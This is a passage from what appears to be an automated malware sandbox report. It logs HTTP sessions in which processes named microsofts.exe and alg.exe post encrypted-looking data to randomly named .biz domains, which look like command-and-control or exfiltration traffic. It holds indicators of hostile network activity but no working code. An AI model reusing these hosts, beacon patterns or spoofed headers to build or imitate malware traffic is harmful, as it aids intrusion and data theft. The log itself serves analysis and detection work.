                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              126192.168.2.55980034.246.200.160801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.981580019 CET344OUTPOST /yk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:27.981599092 CET828OUTData Raw: 51 1b 4e 2e 90 13 81 87 30 03 00 00 3e d2 03 19 b6 06 5a 47 99 29 36 60 b3 f9 ca 17 a8 53 77 ed 42 ad ee 29 7e 09 9d 22 71 27 f0 da 29 5b 7f 9b fb e0 ff bf 83 43 bc 7e 55 96 c0 b1 29 7b c4 4f 51 01 25 05 e6 04 21 45 15 e7 6d 12 f8 d9 1e 59 97 ee
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: QN.0>ZG)6`SwB)~"q')[C~U){OQ%!EmYE}s\xIh De`D!04!mhEt! v~y_iY=yTmFT;9*N|oR"yW}UGE*,7Kr<h<h>Pr'UO
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.954812050 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=23bcb80dd1895a4c1004918c527deb09|173.254.250.76|1730822668|1730822668|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              127192.168.2.55980147.129.31.212801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.980695009 CET350OUTPOST /fmrmh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:28.980775118 CET828OUTData Raw: 64 fb b3 fe f2 08 a0 3c 30 03 00 00 01 e0 a1 5e 06 33 da fe 27 f2 82 de fc bd 1f 02 a6 24 c4 85 c0 e8 e6 52 3e 02 4c be 93 b2 41 be 51 82 41 e1 ed 3a cf 7b ea 19 65 2d b9 39 78 4f bf 25 62 44 41 0e 72 c1 97 3c 06 4f e4 70 26 fc 46 d0 fd 37 f0 8c
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: d<0^3'$R>LAQA:{e-9xO%bDAr<Op&F7Y6==\rHitR!fr@JV:~F*EL*|O:r8PEjzx;5~Vhx0&?U?";g<QdG6
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.414443016 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:30 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9d3f4b6521f4e11f9b77343d606122ee|173.254.250.76|1730822670|1730822670|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              128192.168.2.5598023.94.10.34801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.002130985 CET348OUTPOST /cngo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.002221107 CET778OUTData Raw: 22 10 79 d4 6d 56 6e dd fe 02 00 00 45 47 79 97 01 d3 b0 63 72 5f 93 13 e9 78 2f 02 e9 e7 76 d0 6f 12 37 eb 14 21 8f c6 29 2a 26 ed 57 d0 20 8c ca 66 03 4f c7 bb 06 ea 82 a0 a9 37 43 f9 50 0b 9f 7b 90 b4 21 c6 ff 49 11 d7 bb 4c 73 de 4a 62 17 45
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: "ymVnEGycr_x/vo7!)*&W fO7CP{!ILsJbE!@|h/9IvDzx2&4a6t6TU"m;m}2[~5O/DO-@W|QYaq tYny]M|CW3nnwE<I
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:29.656167030 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0bdc64e7efe3508725c96c2343ae3a21|173.254.250.76|1730822669|1730822669|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              129192.168.2.5598033.94.10.34801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.438586950 CET354OUTPOST /wikoehfueo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.438606977 CET828OUTData Raw: 59 97 3e d3 67 e7 22 ec 30 03 00 00 1b 71 8c 41 9b bd 32 a0 08 cb af 6a 2f 47 ce ca 3a 62 03 85 0d 18 02 2b 1d f1 49 f2 cd 1f 0e 50 aa 2b 8f 51 15 48 2e 42 f5 6d 01 79 04 91 cc 9c ac 28 35 d4 00 ce 1c 11 8b fe 1d bd c7 25 4c 68 8f c9 41 dd 41 d8
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Y>g"0qA2j/G:b+IP+QH.Bmy(5%LhAA/'^<#S2x'RJj*A?@l,<Swot/4v0~cV!+xH*/D?rYsJkr-P}b-YS#['+ucCnW*TF%
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.123630047 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8d29d65243bab7f43b50fd64afd802e1|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              130192.168.2.55980435.164.78.200801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.713051081 CET347OUTPOST /iih HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:30.713088989 CET778OUTData Raw: 5b 55 f5 17 9e 71 2f 05 fe 02 00 00 da 8b 6f 02 7b 23 a0 02 97 cf 81 52 d9 d6 b4 c8 24 ed ae ad 8c 05 b5 89 0c 68 bf bf 33 cc 45 5f ac 24 b2 58 37 09 f7 53 25 f5 dd e5 27 3d c1 82 89 c4 38 e8 f2 97 35 d3 a8 b8 ce b7 17 91 66 27 ba 3e 32 40 ad 2f
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: [Uq/o{#R$h3E_$X7S%'=85f'>2@/09p%YJ%BsakY>\4=Qie.xX;(lcPj``".dy7P!tN:y!B[uab7={pz=CxRSHLh,+r?
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.545171976 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0b623f90ae16dc7a5aa34f8c68e95318|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546071053 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0b623f90ae16dc7a5aa34f8c68e95318|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546544075 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0b623f90ae16dc7a5aa34f8c68e95318|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              131192.168.2.55980535.164.78.200801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143604994 CET355OUTPOST /kykfeohkixf HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:31.143634081 CET828OUTData Raw: 9a 0b 39 db 66 a0 ce 60 30 03 00 00 41 83 c6 86 65 de 35 91 e8 83 d4 2c 57 f7 bd b6 db ee c8 d3 6e 89 38 33 9c 5d 72 16 9d b6 7c 62 ff c6 7e 0a 76 ed 08 5c 45 37 4e 07 ae de a5 c3 7b 98 b0 68 58 e0 0e 3a 86 bf c0 fc 32 1b 88 82 4c 0b 33 6a ea 3b
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 9f`0Ae5,Wn83]r|b~v\E7N{hX:2L3j;E&o+gzv7h]/6CdMDyu3NRTxgO[QI6fkvsU8g`I&;h n[x7A[+OGmeI[hA{o_ACdwp/A5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546144009 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=133a725022ac94bf1fd9f5a7adac857e|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.546485901 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=133a725022ac94bf1fd9f5a7adac857e|173.254.250.76|1730822671|1730822671|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              132192.168.2.55980618.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.609092951 CET347OUTPOST /ybxut HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.609321117 CET828OUTData Raw: ea 1a af b0 dd 77 38 7d 30 03 00 00 1e 2d 45 54 ff da a8 8e d7 90 a8 7b 35 bd 89 5b e4 6a 19 b2 c1 21 a2 e5 be a6 81 20 2f b8 18 bf 19 a3 3f d0 dd 90 f2 79 7f 43 5e 9d 0f 0b d7 bf 4a 68 ea 51 1e e3 a9 63 31 0c 8d 8d 68 32 1c 25 1f ea 5e 99 70 c2
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: w8}0-ET{5[j! /?yC^JhQc1h2%^pqBCILz3xunRZXEcO$<U'F]5C1mVID*Jyl16l_4uL{(F@nfP5,*\8.S|U6r1|N;J9/%
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.041248083 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:33 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1375d045b03f71f6d77e11d2b05fac9b|173.254.250.76|1730822673|1730822673|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              133192.168.2.55980818.141.10.107801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.998570919 CET358OUTPOST /yadhctxanlnpjhwu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:32.998759985 CET778OUTData Raw: bf b8 e1 d9 87 f3 bc e6 fe 02 00 00 40 43 00 a6 82 0a c7 47 e1 59 21 02 e5 36 c6 f4 f8 6f a3 c5 12 13 b8 84 1e f3 80 4d b7 6c d6 26 d8 30 0c 01 f1 62 61 89 1d be 37 8a 9a f9 a2 f3 fd 92 e1 03 ee 6f a6 ef 0a 48 a5 b6 4c 53 42 a6 7c c5 1c c2 30 1a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: @CGY!6oMl&0ba7oHLSB|0[D|lGny]p\3Z)s9g7^=W9YS<YU9=PVgqK^]jFo Wa zxX3WMY@C4^\k(,nYF_
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.432279110 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=06e06de0d67d91d73d6dbfa1f0730e18|173.254.250.76|1730822674|1730822674|0|1|0; path=/; domain=.whjovd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              134192.168.2.559809208.100.26.245801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.133176088 CET353OUTPOST /aloksmnh HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gjogvvpsf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.133244038 CET828OUTData Raw: 7e dd 60 66 53 81 4a 61 30 03 00 00 78 26 af 4b 82 37 ff 49 01 8d 22 0b 1d b5 68 f3 a6 6e fd b2 e3 d6 53 d5 eb ec 6a 08 f9 67 30 0d 56 59 28 04 1b ca e6 ed 67 7d 96 a2 94 59 27 85 08 42 ae 78 11 42 46 98 b1 e4 aa b1 cf a9 21 a3 eb 4a a2 b9 27 fb
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ~`fSJa0x&K7I"hnSjg0VY(g}Y'BxBF!J'i3t.=6z4t3oGw[5tz_G$`g),ye/sYsYA'LFumCN7k1T!A]BpH-}("iAJ6gC
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:34.775217056 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:34 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: keep-alive
